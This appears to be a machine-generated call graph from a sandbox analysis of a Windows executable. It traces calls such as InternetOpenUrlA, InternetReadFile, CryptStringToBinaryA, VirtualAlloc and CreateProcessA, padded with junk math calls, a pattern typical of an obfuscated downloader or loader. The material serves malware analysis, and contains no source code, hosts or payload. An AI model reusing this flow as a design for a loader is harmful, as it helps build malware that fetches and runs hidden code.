13986->13987 13993 7ff6a9526e8d 13987->13993 13988 7ff6a953a968 std::_Facet_Register 3 API calls 13989 7ff6a9526f36 memset 13988->13989 13989->13972 13991 7ff6a952ff10 3 API calls 13990->13991 13995 7ff6a952921f 13991->13995 13992->13972 13993->13988 13994 7ff6a95280ca pow 13994->14022 13996 7ff6a952ff40 3 API calls 13995->13996 14000 7ff6a952926c 13996->14000 13997 7ff6a95280f7 tan 13998 7ff6a952ea80 7 API calls 13997->13998 13998->14022 13999->14001 14002 7ff6a952ff70 3 API calls 14000->14002 14001->13907 14006 7ff6a95292b9 14002->14006 14003->13956 14004 7ff6a952e450 4 API calls 14004->14022 14005 7ff6a9512460 9 API calls 14005->14022 14007 7ff6a9511670 2 API calls 14006->14007 14048 7ff6a9529306 14007->14048 14008 7ff6a952969b 14009 7ff6a952e300 2 API calls 14008->14009 14013 7ff6a95296b3 14009->14013 14010->14014 14011->13972 14012 7ff6a952994c VirtualAlloc 14015 7ff6a952996d 14012->14015 14013->14012 14013->14015 14014->13957 14015->14015 14524 7ff6a952fc80 14015->14524 14019 7ff6a952941a pow 14019->14048 14020 7ff6a952e3f0 2 API calls 14020->14022 14022->13980 14022->13994 14022->13997 14022->14004 14022->14005 14022->14020 14025 7ff6a952ea20 collate 2 API calls 14022->14025 14030 7ff6a9511670 2 API calls 14022->14030 14024 7ff6a9529448 tan 14027 7ff6a952ea80 7 API calls 14024->14027 14025->14022 14027->14048 14028 7ff6a952fd60 11 API calls 14029 7ff6a9529aea 14028->14029 14031 7ff6a952ea20 collate 2 API calls 14029->14031 14030->14022 14032 7ff6a9529af8 14031->14032 14033 7ff6a952ea20 collate 2 API calls 14032->14033 14034 7ff6a9529b06 14033->14034 14036 7ff6a952ea20 collate 2 API calls 14034->14036 14035 7ff6a952e450 4 API calls 14035->14048 14037 7ff6a9529b14 ?_Random_device@std@ 14036->14037 14038 7ff6a9529b29 14037->14038 14039 7ff6a9511670 2 API calls 14038->14039 14041 7ff6a9529b66 14039->14041 14040 7ff6a9512460 9 API calls 14040->14048 14042 7ff6a952fe80 3 API calls 14041->14042 14043 7ff6a9529bbd 14042->14043 14044 7ff6a952feb0 3 API calls 14043->14044 14045 7ff6a9529c0a 14044->14045 14046 7ff6a952fee0 3 API calls 14045->14046 14050 7ff6a9529c57 14046->14050 14047 7ff6a952e3f0 2 API calls 14047->14048 14048->14008 14048->14019 14048->14024 14048->14035 14048->14040 14048->14047 14049 7ff6a952ea20 collate 2 API calls 14048->14049 14052 7ff6a9511670 2 API calls 14048->14052 14049->14048 14051 7ff6a952ff10 3 API calls 14050->14051 14053 7ff6a9529ca4 14051->14053 14052->14048 14054 7ff6a952ff40 3 API calls 14053->14054 14055 7ff6a9529cf1 14054->14055 14056 7ff6a952ff70 3 API calls 14055->14056 14093 7ff6a9529d3e 14056->14093 14057 7ff6a9511670 2 API calls 14057->14093 14058 7ff6a952a0fa 14059 7ff6a952e300 2 API calls 14058->14059 14060 7ff6a952a10b 14059->14060 14061 7ff6a9530680 7 API calls 14060->14061 14062 7ff6a952a3cf 14061->14062 14063 7ff6a952fd00 11 API calls 14062->14063 14064 7ff6a952a3e8 14063->14064 14065 7ff6a9517ec0 49 API calls 14064->14065 14066 7ff6a952a3f8 14065->14066 14538 7ff6a9519150 14066->14538 14068 7ff6a952a409 14612 7ff6a952e1f0 14068->14612 14073 7ff6a952ea20 collate 2 API calls 14075 7ff6a952a42c 14073->14075 14074 7ff6a9529e96 pow 14074->14093 14077 7ff6a952ea20 collate 2 API calls 14075->14077 14076 7ff6a9529ec4 tan 14078 7ff6a952ea80 7 API calls 14076->14078 14079 7ff6a952a43a ?_Random_device@std@ 14077->14079 14078->14093 14080 7ff6a952a44f 14079->14080 14081 7ff6a9511670 2 API calls 14080->14081 14083 7ff6a952a48c 14081->14083 14082 7ff6a952e450 4 API calls 14082->14093 14084 7ff6a952fe80 3 API calls 14083->14084 14086 7ff6a952a4e3 14084->14086 14085 7ff6a9512460 9 API calls 14085->14093 14087 7ff6a952feb0 3 API calls 14086->14087 14088 7ff6a952a530 14087->14088 14089 7ff6a952fee0 3 API calls 14088->14089 14090 7ff6a952a57d 14089->14090 14091 7ff6a952ff10 3 API calls 14090->14091 14095 7ff6a952a5ca 14091->14095 14092 7ff6a952e3f0 2 API calls 14092->14093 14093->14057 14093->14058 14093->14074 14093->14076 14093->14082 14093->14085 14093->14092 14094 7ff6a952ea20 collate 2 API calls 14093->14094 14094->14093 14096 7ff6a952ff40 3 API calls 14095->14096 14097 7ff6a952a617 14096->14097 14098 7ff6a952ff70 3 API calls 14097->14098 14156 7ff6a952a664 14098->14156 14099 7ff6a9511670 2 API calls 14099->14156 14100 7ff6a952aa2a 14101 7ff6a952e300 2 API calls 14100->14101 14102 7ff6a952aa3b 14101->14102 14624 7ff6a9514640 14102->14624 14105 7ff6a952fd00 11 API calls 14106 7ff6a952aa9f 14105->14106 14107 7ff6a952fd60 11 API calls 14106->14107 14108 7ff6a952aab7 14107->14108 14109 7ff6a952fd00 11 API calls 14108->14109 14110 7ff6a952aacd 14109->14110 14111 7ff6a952ea20 collate 2 API calls 14110->14111 14112 7ff6a952aadb 14111->14112 14113 7ff6a952ea20 collate 2 API calls 14112->14113 14118 7ff6a952a7c6 pow 14118->14156 14121 7ff6a952a7f4 tan 14123 7ff6a952ea80 7 API calls 14121->14123 14123->14156 14128 7ff6a952e450 4 API calls 14128->14156 14135 7ff6a9512460 9 API calls 14135->14156 14154 7ff6a952e3f0 2 API calls 14154->14156 14156->14099 14156->14100 14156->14118 14156->14121 14156->14128 14156->14135 14156->14154 14157 7ff6a952ea20 collate 2 API calls 14156->14157 14157->14156 14171 7ff6a953aee1 14170->14171 14171->13803 14171->13815 14173 7ff6a953b4a6 14172->14173 14174 7ff6a953b4b4 memset RtlCaptureContext RtlLookupFunctionEntry 14173->14174 14175 7ff6a953b52a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14174->14175 14176 7ff6a953b4ee RtlVirtualUnwind 14174->14176 14177 7ff6a953b5aa 14175->14177 14176->14175 14177->13801 14761 7ff6a953b9a0 14178->14761 14181 7ff6a95237a0 14181->14181 14182 7ff6a9511670 2 API calls 14181->14182 14183 7ff6a95237ee 14182->14183 14184 7ff6a953a968 std::_Facet_Register 3 API calls 14183->14184 14185 7ff6a9523816 14184->14185 14186 7ff6a9532150 6 API calls 14185->14186 14188 7ff6a9523836 14185->14188 14186->14188 14187 7ff6a953a968 std::_Facet_Register 3 API calls 14189 7ff6a9523875 14187->14189 14188->14187 14190 7ff6a9532150 6 API calls 14189->14190 14193 7ff6a9523895 14189->14193 14190->14193 14191 7ff6a953a968 std::_Facet_Register 3 API calls 14192 7ff6a95238d4 14191->14192 14194 7ff6a9532150 6 API calls 14192->14194 14196 7ff6a95238f4 14192->14196 14193->14191 14194->14196 14195 7ff6a953a968 std::_Facet_Register 3 API calls 14197 7ff6a9523933 14195->14197 14196->14195 14198 7ff6a9532150 6 API calls 14197->14198 14200 7ff6a9523953 14197->14200 14198->14200 14199 7ff6a953a968 std::_Facet_Register 3 API calls 14201 7ff6a9523992 14199->14201 14200->14199 14202 7ff6a9532150 6 API calls 14201->14202 14205 7ff6a95239b2 14201->14205 14202->14205 14203 7ff6a953a968 std::_Facet_Register 3 API calls 14204 7ff6a95239f1 14203->14204 14206 7ff6a9532150 6 API calls 14204->14206 14223 7ff6a9523a11 14204->14223 14205->14203 14206->14223 14207 7ff6a9523a73 _Query_perf_frequency _Query_perf_counter 14207->14223 14208 7ff6a9524502 SleepEx 14209 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14208->14209 14212 7ff6a952451a 14209->14212 14210 7ff6a95244fa 14214 7ff6a953a960 _Receive_impl free 14210->14214 14211 7ff6a952448a 14211->14208 14211->14210 14213 7ff6a95244f3 _invalid_parameter_noinfo_noreturn 14211->14213 14212->13825 14212->13826 14213->14210 14214->14208 14215 7ff6a9523d2c log cos sin exp 14215->14223 14216 7ff6a9523dc1 pow 14216->14223 14217 7ff6a9523e20 tan 14218 7ff6a95311f0 7 API calls 14217->14218 14221 7ff6a9523e6b 14218->14221 14219 7ff6a953a968 std::_Facet_Register 3 API calls 14220 7ff6a9523edf memset 14219->14220 14220->14223 14221->14219 14222 7ff6a9532ac0 memcpy 14222->14223 14223->14207 14223->14211 14223->14215 14223->14216 14223->14217 14223->14222 14224 7ff6a952447c _invalid_parameter_noinfo_noreturn 14223->14224 14225 7ff6a953a960 free _Receive_impl 14223->14225 14226 7ff6a9524483 _invalid_parameter_noinfo_noreturn 14223->14226 14224->14226 14225->14223 14226->14211 14228 7ff6a9531be8 memcpy memcpy 14227->14228 14232 7ff6a9531b67 14227->14232 14228->13838 14229 7ff6a9531b7c 14230 7ff6a953a968 std::_Facet_Register 3 API calls 14229->14230 14234 7ff6a9531b92 14230->14234 14231 7ff6a9531bdd 14233 7ff6a953a968 std::_Facet_Register 3 API calls 14231->14233 14232->14229 14232->14231 14235 7ff6a9531c29 14232->14235 14236 7ff6a9531b97 14232->14236 14233->14236 14234->14236 14238 7ff6a9531bd6 _invalid_parameter_noinfo_noreturn 14234->14238 14237 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 14235->14237 14236->14228 14239 7ff6a9531c2e 14237->14239 14238->14231 14241 7ff6a9530690 14240->14241 14241->14241 14242 7ff6a95306dd 14241->14242 14243 7ff6a95306b0 14241->14243 14763 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 14242->14763 14245 7ff6a9531b10 6 API calls 14243->14245 14247 7ff6a95306d4 14245->14247 14247->13854 14249 7ff6a9530740 14248->14249 14249->14249 14764 7ff6a953a3dc ___lc_codepage_func 14249->14764 14254 7ff6a95130c0 14255 7ff6a95130df 14254->14255 14823 7ff6a953a518 14255->14823 14258 7ff6a9513191 14259 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14258->14259 14260 7ff6a95131a4 14259->14260 14260->13922 14261 7ff6a95131b1 14262 7ff6a95131e2 14261->14262 14263 7ff6a953a960 _Receive_impl free 14261->14263 14262->13922 14263->14262 14265 7ff6a9512723 14264->14265 14266 7ff6a9512754 14264->14266 14267 7ff6a951274c 14265->14267 14268 7ff6a951276b _invalid_parameter_noinfo_noreturn 14265->14268 14266->13927 14269 7ff6a953a960 _Receive_impl free 14267->14269 14269->14266 14271 7ff6a951d3ca 14270->14271 14272 7ff6a951d4a8 MultiByteToWideChar 14271->14272 14273 7ff6a951d4de 14272->14273 14274 7ff6a951d4eb MultiByteToWideChar 14273->14274 14275 7ff6a952e780 7 API calls 14274->14275 14276 7ff6a951d515 14275->14276 14277 7ff6a953a960 _Receive_impl free 14276->14277 14278 7ff6a951d51d 14277->14278 14862 7ff6a95134b0 14278->14862 14281 7ff6a9512710 2 API calls 14282 7ff6a951d552 14281->14282 14283 7ff6a9512710 2 API calls 14282->14283 14285 7ff6a951d55f 14283->14285 14284 7ff6a951d89a VirtualAlloc 14286 7ff6a951d8bb 14284->14286 14285->14284 14285->14286 14286->14286 14287 7ff6a951d98e ?_Random_device@std@ 14286->14287 14288 7ff6a951d9c2 14287->14288 14289 7ff6a9511670 2 API calls 14288->14289 14290 7ff6a951d9ff 14289->14290 14291 7ff6a952fe80 3 API calls 14290->14291 14292 7ff6a951da44 14291->14292 14293 7ff6a952feb0 3 API calls 14292->14293 14294 7ff6a951da81 14293->14294 14295 7ff6a952fee0 3 API calls 14294->14295 14296 7ff6a951dabe 14295->14296 14297 7ff6a952ff10 3 API calls 14296->14297 14298 7ff6a951dafb 14297->14298 14299 7ff6a952ff40 3 API calls 14298->14299 14300 7ff6a951db38 14299->14300 14301 7ff6a952ff70 3 API calls 14300->14301 14302 7ff6a951db75 14301->14302 14303 7ff6a9511670 2 API calls 14302->14303 14331 7ff6a951dbb2 14303->14331 14304 7ff6a951df0c 14305 7ff6a952e300 2 API calls 14304->14305 14307 7ff6a951df23 14305->14307 14306 7ff6a951df8a VirtualAlloc 14308 7ff6a951dfab 14306->14308 14307->14306 14307->14308 14308->14308 14310 7ff6a9530680 7 API calls 14308->14310 14309 7ff6a951dcbb pow 14309->14331 14311 7ff6a951e5b9 14310->14311 14312 7ff6a952fd00 11 API calls 14311->14312 14316 7ff6a951e5cd 14312->14316 14313 7ff6a951dce6 tan 14314 7ff6a952ea80 7 API calls 14313->14314 14314->14331 14315 7ff6a952e450 4 API calls 14315->14331 14317 7ff6a951e63a VirtualAlloc 14316->14317 14318 7ff6a951e65b 14316->14318 14317->14318 14318->14318 14320 7ff6a952ea20 collate 2 API calls 14318->14320 14319 7ff6a9512460 9 API calls 14319->14331 14321 7ff6a951e75a 14320->14321 14322 7ff6a952ea20 collate 2 API calls 14321->14322 14323 7ff6a951e767 ?_Random_device@std@ 14322->14323 14324 7ff6a951e77b 14323->14324 14325 7ff6a9511670 2 API calls 14324->14325 14326 7ff6a951e7b4 14325->14326 14327 7ff6a952fe80 3 API calls 14326->14327 14328 7ff6a951e7f9 14327->14328 14329 7ff6a952feb0 3 API calls 14328->14329 14333 7ff6a951e836 14329->14333 14330 7ff6a952e3f0 2 API calls 14330->14331 14331->14304 14331->14309 14331->14313 14331->14315 14331->14319 14331->14330 14332 7ff6a952ea20 collate 2 API calls 14331->14332 14335 7ff6a9511670 2 API calls 14331->14335 14332->14331 14334 7ff6a952fee0 3 API calls 14333->14334 14336 7ff6a951e873 14334->14336 14335->14331 14337 7ff6a952ff10 3 API calls 14336->14337 14338 7ff6a951e8b0 14337->14338 14339 7ff6a952ff40 3 API calls 14338->14339 14340 7ff6a951e8ed 14339->14340 14341 7ff6a952ff70 3 API calls 14340->14341 14342 7ff6a951e92a 14341->14342 14343 7ff6a9511670 2 API calls 14342->14343 14368 7ff6a951e967 14343->14368 14344 7ff6a951ecac 14345 7ff6a952e300 2 API calls 14344->14345 14347 7ff6a951ecc3 14345->14347 14346 7ff6a951ed29 VirtualAlloc 14349 7ff6a951ed4a 14346->14349 14347->14346 14347->14349 14348 7ff6a951ea5b pow 14348->14368 14351 7ff6a951f0fd VirtualAlloc 14349->14351 14353 7ff6a951f11e ?_Random_device@std@ 14349->14353 14350 7ff6a951ea86 tan 14352 7ff6a952ea80 7 API calls 14350->14352 14351->14353 14352->14368 14355 7ff6a951f222 14353->14355 14357 7ff6a9511670 2 API calls 14355->14357 14356 7ff6a952e450 4 API calls 14356->14368 14358 7ff6a951f25b 14357->14358 14360 7ff6a952fe80 3 API calls 14358->14360 14359 7ff6a9512460 9 API calls 14359->14368 14361 7ff6a951f2a0 14360->14361 14362 7ff6a952feb0 3 API calls 14361->14362 14363 7ff6a951f2dd 14362->14363 14364 7ff6a952fee0 3 API calls 14363->14364 14365 7ff6a951f31a 14364->14365 14367 7ff6a952ff10 3 API calls 14365->14367 14366 7ff6a952e3f0 2 API calls 14366->14368 14371 7ff6a951f357 14367->14371 14368->14344 14368->14348 14368->14350 14368->14356 14368->14359 14368->14366 14369 7ff6a952ea20 collate 2 API calls 14368->14369 14370 7ff6a9511670 2 API calls 14368->14370 14369->14368 14370->14368 14372 7ff6a952ff40 3 API calls 14371->14372 14373 7ff6a951f394 14372->14373 14374 7ff6a952ff70 3 API calls 14373->14374 14375 7ff6a951f3d1 14374->14375 14376 7ff6a9511670 2 API calls 14375->14376 14402 7ff6a951f40e 14376->14402 14377 7ff6a951f74c 14378 7ff6a952e300 2 API calls 14377->14378 14380 7ff6a951f763 14378->14380 14379 7ff6a951f7c9 VirtualAlloc 14381 7ff6a951f7ea 14379->14381 14380->14379 14380->14381 14382 7ff6a9530680 7 API calls 14381->14382 14387 7ff6a951faea 14382->14387 14383 7ff6a951f4fb pow 14383->14402 14384 7ff6a951f526 tan 14385 7ff6a952ea80 7 API calls 14384->14385 14385->14402 14386 7ff6a951fb59 VirtualAlloc 14388 7ff6a951fb7a 14386->14388 14387->14386 14387->14388 14388->14388 14390 7ff6a952ea20 collate 2 API calls 14388->14390 14389 7ff6a952e450 4 API calls 14389->14402 14392 7ff6a951fc7a ?_Random_device@std@ 14390->14392 14391 7ff6a9512460 9 API calls 14391->14402 14393 7ff6a951fc8e 14392->14393 14394 7ff6a9511670 2 API calls 14393->14394 14395 7ff6a951fcc7 14394->14395 14396 7ff6a952fe80 3 API calls 14395->14396 14397 7ff6a951fd0c 14396->14397 14398 7ff6a952feb0 3 API calls 14397->14398 14399 7ff6a951fd49 14398->14399 14400 7ff6a952fee0 3 API calls 14399->14400 14405 7ff6a951fd86 14400->14405 14401 7ff6a952e3f0 2 API calls 14401->14402 14402->14377 14402->14383 14402->14384 14402->14389 14402->14391 14402->14401 14403 7ff6a952ea20 collate 2 API calls 14402->14403 14404 7ff6a9511670 2 API calls 14402->14404 14403->14402 14404->14402 14406 7ff6a952ff10 3 API calls 14405->14406 14407 7ff6a951fdc3 14406->14407 14408 7ff6a952ff40 3 API calls 14407->14408 14409 7ff6a951fe00 14408->14409 14410 7ff6a952ff70 3 API calls 14409->14410 14411 7ff6a951fe3d 14410->14411 14412 7ff6a9511670 2 API calls 14411->14412 14428 7ff6a951fe7a 14412->14428 14413 7ff6a95201bc 14414 7ff6a952e300 2 API calls 14413->14414 14416 7ff6a95201d3 14414->14416 14415 7ff6a952049a VirtualAlloc 14417 7ff6a95204bb 14415->14417 14416->14415 14416->14417 14417->14417 14418 7ff6a952ea20 collate 2 API calls 14417->14418 14419 7ff6a95205b3 14418->14419 14420 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14419->14420 14421 7ff6a95205e1 14420->14421 14421->13943 14422 7ff6a951ff6b pow 14422->14428 14423 7ff6a951ff96 tan 14424 7ff6a952ea80 7 API calls 14423->14424 14424->14428 14425 7ff6a952e450 4 API calls 14425->14428 14426 7ff6a9512460 9 API calls 14426->14428 14427 7ff6a952e3f0 2 API calls 14427->14428 14428->14413 14428->14422 14428->14423 14428->14425 14428->14426 14428->14427 14429 7ff6a952ea20 collate 2 API calls 14428->14429 14430 7ff6a9511670 2 API calls 14428->14430 14429->14428 14430->14428 15069 7ff6a9531840 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 14431->15069 14436 7ff6a953a968 std::_Facet_Register 3 API calls 14437 7ff6a952c721 14436->14437 15102 7ff6a9532430 14437->15102 14441 7ff6a952c79b 14442 7ff6a952c7fb 14441->14442 14443 7ff6a952c7f6 14441->14443 14445 7ff6a952c7ef _invalid_parameter_noinfo_noreturn 14441->14445 14444 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14442->14444 14446 7ff6a953a960 _Receive_impl free 14443->14446 14447 7ff6a9528d97 14444->14447 14445->14443 14446->14442 14447->13942 14449 7ff6a9517ee2 14448->14449 14449->14449 14450 7ff6a95181b2 InternetOpenA ?_Random_device@std@ 14449->14450 14451 7ff6a95181f0 14450->14451 14451->14451 14452 7ff6a9511670 2 API calls 14451->14452 14453 7ff6a951823d 14452->14453 14454 7ff6a953a968 std::_Facet_Register 3 API calls 14453->14454 14455 7ff6a9518263 14454->14455 14456 7ff6a9532150 6 API calls 14455->14456 14458 7ff6a9518281 14455->14458 14456->14458 14457 7ff6a953a968 std::_Facet_Register 3 API calls 14459 7ff6a95182bd 14457->14459 14458->14457 14460 7ff6a9532150 6 API calls 14459->14460 14462 7ff6a95182db 14459->14462 14460->14462 14461 7ff6a953a968 std::_Facet_Register 3 API calls 14463 7ff6a9518317 14461->14463 14462->14461 14464 7ff6a9532150 6 API calls 14463->14464 14466 7ff6a9518335 14463->14466 14464->14466 14465 7ff6a953a968 std::_Facet_Register 3 API calls 14467 7ff6a9518371 14465->14467 14466->14465 14468 7ff6a9532150 6 API calls 14467->14468 14470 7ff6a951838f 14467->14470 14468->14470 14469 7ff6a953a968 std::_Facet_Register 3 API calls 14471 7ff6a95183cb 14469->14471 14470->14469 14472 7ff6a9532150 6 API calls 14471->14472 14474 7ff6a95183e9 14471->14474 14472->14474 14473 7ff6a953a968 std::_Facet_Register 3 API calls 14475 7ff6a9518425 14473->14475 14474->14473 14476 7ff6a9532150 6 API calls 14475->14476 14508 7ff6a951844b 14475->14508 14476->14508 14477 7ff6a95184aa _Query_perf_frequency _Query_perf_counter 14477->14508 14478 7ff6a9518f22 14479 7ff6a951907c InternetCloseHandle 14478->14479 14484 7ff6a9518f61 InternetOpenUrlA 14478->14484 14482 7ff6a95190cb 14479->14482 14483 7ff6a951909f 14479->14483 14480 7ff6a9518ea8 14480->14478 14481 7ff6a9518f1a 14480->14481 14486 7ff6a9518f13 _invalid_parameter_noinfo_noreturn 14480->14486 14487 7ff6a953a960 _Receive_impl free 14481->14487 14485 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14482->14485 14488 7ff6a95190c3 14483->14488 14492 7ff6a9519140 _invalid_parameter_noinfo_noreturn 14483->14492 14484->14479 14493 7ff6a9518f86 14484->14493 14491 7ff6a95190ed 14485->14491 14486->14481 14487->14478 14489 7ff6a953a960 _Receive_impl free 14488->14489 14489->14482 14490 7ff6a9518f90 InternetReadFile 14490->14493 14512 7ff6a9530780 14491->14512 14493->14490 14494 7ff6a9518fd1 memcpy 14493->14494 14495 7ff6a9531060 10 API calls 14493->14495 14496 7ff6a9518ffe memset 14494->14496 14495->14496 14496->14490 14497 7ff6a9519019 InternetCloseHandle InternetCloseHandle 14496->14497 14497->14482 14498 7ff6a9519051 14497->14498 14498->14488 14499 7ff6a9519075 _invalid_parameter_noinfo_noreturn 14498->14499 14499->14479 14500 7ff6a951874c log cos sin exp 14500->14508 14501 7ff6a95187e1 pow 14501->14508 14502 7ff6a9518840 tan 14503 7ff6a95311f0 7 API calls 14502->14503 14506 7ff6a951888b 14503->14506 14504 7ff6a953a968 std::_Facet_Register 3 API calls 14505 7ff6a95188fe memset 14504->14505 14505->14508 14506->14504 14507 7ff6a9532ac0 memcpy 14507->14508 14508->14477 14508->14480 14508->14500 14508->14501 14508->14502 14508->14507 14509 7ff6a9518e9a _invalid_parameter_noinfo_noreturn 14508->14509 14510 7ff6a953a960 free _Receive_impl 14508->14510 14511 7ff6a9518ea1 _invalid_parameter_noinfo_noreturn 14508->14511 14509->14511 14510->14508 14511->14480 14513 7ff6a95307e0 14512->14513 14513->14513 14514 7ff6a95311f0 7 API calls 14513->14514 14515 7ff6a95307f7 14514->14515 15686 7ff6a9532d90 14515->15686 14518 7ff6a9530872 14519 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14518->14519 14521 7ff6a9529070 14519->14521 14520 7ff6a953086d 14523 7ff6a953a960 _Receive_impl free 14520->14523 14521->13953 14522 7ff6a9530866 _invalid_parameter_noinfo_noreturn 14522->14520 14523->14518 14525 7ff6a952fca0 14524->14525 14525->14525 14526 7ff6a952fcbc 14525->14526 14527 7ff6a952fcf3 14525->14527 14528 7ff6a9531b10 6 API calls 14526->14528 15829 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 14527->15829 14530 7ff6a9529aa3 14528->14530 14532 7ff6a952fd60 14530->14532 15830 7ff6a952e980 14532->15830 14534 7ff6a9529abb 14535 7ff6a952fd00 14534->14535 15837 7ff6a952e8f0 14535->15837 14537 7ff6a9529ad1 14537->14028 14539 7ff6a9519172 14538->14539 14540 7ff6a951922c CryptStringToBinaryA 14539->14540 14541 7ff6a9519271 ?_Random_device@std@ 14540->14541 14593 7ff6a9519258 14540->14593 14542 7ff6a9519290 14541->14542 14542->14542 14545 7ff6a9511670 2 API calls 14542->14545 14543 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14544 7ff6a951a11c 14543->14544 14544->14068 14546 7ff6a95192dd 14545->14546 14547 7ff6a953a968 std::_Facet_Register 3 API calls 14546->14547 14548 7ff6a9519303 14547->14548 14549 7ff6a9532150 6 API calls 14548->14549 14551 7ff6a9519321 14548->14551 14549->14551 14550 7ff6a953a968 std::_Facet_Register 3 API calls 14552 7ff6a951935e 14550->14552 14551->14550 14553 7ff6a9532150 6 API calls 14552->14553 14555 7ff6a951937c 14552->14555 14553->14555 14554 7ff6a953a968 std::_Facet_Register 3 API calls 14556 7ff6a95193b9 14554->14556 14555->14554 14557 7ff6a9532150 6 API calls 14556->14557 14559 7ff6a95193d7 14556->14559 14557->14559 14558 7ff6a953a968 std::_Facet_Register 3 API calls 14560 7ff6a9519414 14558->14560 14559->14558 14561 7ff6a9532150 6 API calls 14560->14561 14563 7ff6a9519432 14560->14563 14561->14563 14562 7ff6a953a968 std::_Facet_Register 3 API calls 14564 7ff6a951946f 14562->14564 14563->14562 14565 7ff6a9532150 6 API calls 14564->14565 14567 7ff6a951948d 14564->14567 14565->14567 14566 7ff6a953a968 std::_Facet_Register 3 API calls 14568 7ff6a95194ca 14566->14568 14567->14566 14569 7ff6a9532150 6 API calls 14568->14569 14602 7ff6a95194e8 14568->14602 14569->14602 14570 7ff6a9519548 _Query_perf_frequency _Query_perf_counter 14570->14602 14571 7ff6a9519fd6 14572 7ff6a951a044 CryptStringToBinaryA 14571->14572 14576 7ff6a951a01f 14571->14576 14577 7ff6a9519ff3 14571->14577 14579 7ff6a951a07d 14572->14579 14572->14593 14573 7ff6a9519f5a 14573->14571 14575 7ff6a9519fce 14573->14575 14580 7ff6a9519fc7 _invalid_parameter_noinfo_noreturn 14573->14580 14581 7ff6a953a960 _Receive_impl free 14575->14581 14578 7ff6a953a968 std::_Facet_Register 3 API calls 14576->14578 14582 7ff6a951a16f 14577->14582 14583 7ff6a951a000 14577->14583 14584 7ff6a951a027 memset 14578->14584 14589 7ff6a951a0c5 14579->14589 14590 7ff6a951a0be _invalid_parameter_noinfo_noreturn 14579->14590 14579->14593 14580->14575 14581->14571 14585 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 14582->14585 14586 7ff6a953a968 std::_Facet_Register 3 API calls 14583->14586 14584->14572 14588 7ff6a951a174 malloc memcpy 14585->14588 14587 7ff6a951a005 14586->14587 14587->14584 14587->14590 14594 7ff6a951a46c getenv _flushall CreateProcessA 14588->14594 14595 7ff6a951a255 14588->14595 14591 7ff6a953a960 _Receive_impl free 14589->14591 14590->14589 14591->14593 14593->14543 14596 7ff6a951a506 free 14594->14596 14597 7ff6a951a4d0 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle 14594->14597 14595->14594 14598 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14596->14598 14597->14596 14599 7ff6a951a523 14598->14599 14599->14068 14600 7ff6a95197fc log cos sin exp 14600->14602 14601 7ff6a9519891 pow 14601->14602 14602->14570 14602->14573 14602->14600 14602->14601 14603 7ff6a95198f0 tan 14602->14603 14608 7ff6a9532ac0 memcpy 14602->14608 14609 7ff6a9519f4c _invalid_parameter_noinfo_noreturn 14602->14609 14610 7ff6a953a960 free _Receive_impl 14602->14610 14611 7ff6a9519f53 _invalid_parameter_noinfo_noreturn 14602->14611 14604 7ff6a95311f0 7 API calls 14603->14604 14607 7ff6a951993b 14604->14607 14605 7ff6a953a968 std::_Facet_Register 3 API calls 14606 7ff6a95199ae memset 14605->14606 14606->14602 14607->14605 14608->14602 14609->14611 14610->14602 14611->14573 14613 7ff6a952e20d 14612->14613 14617 7ff6a952a411 14612->14617 14614 7ff6a952e248 14613->14614 14615 7ff6a952e2a0 _invalid_parameter_noinfo_noreturn 14613->14615 14613->14617 14616 7ff6a953a960 _Receive_impl free 14614->14616 14616->14617 14618 7ff6a952e190 14617->14618 14620 7ff6a952e1a1 14618->14620 14623 7ff6a952a41e 14618->14623 14619 7ff6a952e1c6 14622 7ff6a953a960 _Receive_impl free 14619->14622 14620->14619 14621 7ff6a952e1e1 _invalid_parameter_noinfo_noreturn 14620->14621 14622->14623 14623->14073 14625 7ff6a951466a 14624->14625 14625->14625 14626 7ff6a95311f0 7 API calls 14625->14626 14627 7ff6a95149ee 14626->14627 14628 7ff6a95311f0 7 API calls 14627->14628 14629 7ff6a9514c7a 14628->14629 14630 7ff6a95311f0 7 API calls 14629->14630 14631 7ff6a9514efa 14630->14631 14632 7ff6a95311f0 7 API calls 14631->14632 14633 7ff6a951516a 14632->14633 14634 7ff6a95311f0 7 API calls 14633->14634 14635 7ff6a95153da 14634->14635 14636 7ff6a95311f0 7 API calls 14635->14636 14637 7ff6a951565a 14636->14637 14638 7ff6a95311f0 7 API calls 14637->14638 14639 7ff6a95158da 14638->14639 14640 7ff6a95311f0 7 API calls 14639->14640 14641 7ff6a9515b5a 14640->14641 14642 7ff6a95311f0 7 API calls 14641->14642 14643 7ff6a9515ddb 14642->14643 14644 7ff6a95311f0 7 API calls 14643->14644 14645 7ff6a9516071 14644->14645 14646 7ff6a95311f0 7 API calls 14645->14646 14647 7ff6a95162f1 14646->14647 14648 7ff6a95311f0 7 API calls 14647->14648 14649 7ff6a9516571 14648->14649 14650 7ff6a95311f0 7 API calls 14649->14650 14651 7ff6a9516811 14650->14651 14652 7ff6a95311f0 7 API calls 14651->14652 14653 7ff6a9516aa1 14652->14653 14654 7ff6a95311f0 7 API calls 14653->14654 14655 7ff6a9516d20 14654->14655 14656 7ff6a953a968 std::_Facet_Register 3 API calls 14655->14656 14657 7ff6a9516d3d 14656->14657 14658 7ff6a952eac0 20 API calls 14657->14658 14659 7ff6a9516dba 14657->14659 14658->14657 15844 7ff6a95312f0 14659->15844 14661 7ff6a9516dcc 14662 7ff6a9516df6 ?_Random_device@std@ 14661->14662 14663 7ff6a9516e20 14662->14663 14663->14663 14664 7ff6a9511670 2 API calls 14663->14664 14665 7ff6a9516e7c 14664->14665 14666 7ff6a953a968 std::_Facet_Register 3 API calls 14665->14666 14667 7ff6a9516eab 14666->14667 14668 7ff6a9532150 6 API calls 14667->14668 14670 7ff6a9516ecf 14667->14670 14668->14670 14669 7ff6a953a968 std::_Facet_Register 3 API calls 14671 7ff6a9516f11 14669->14671 14670->14669 14672 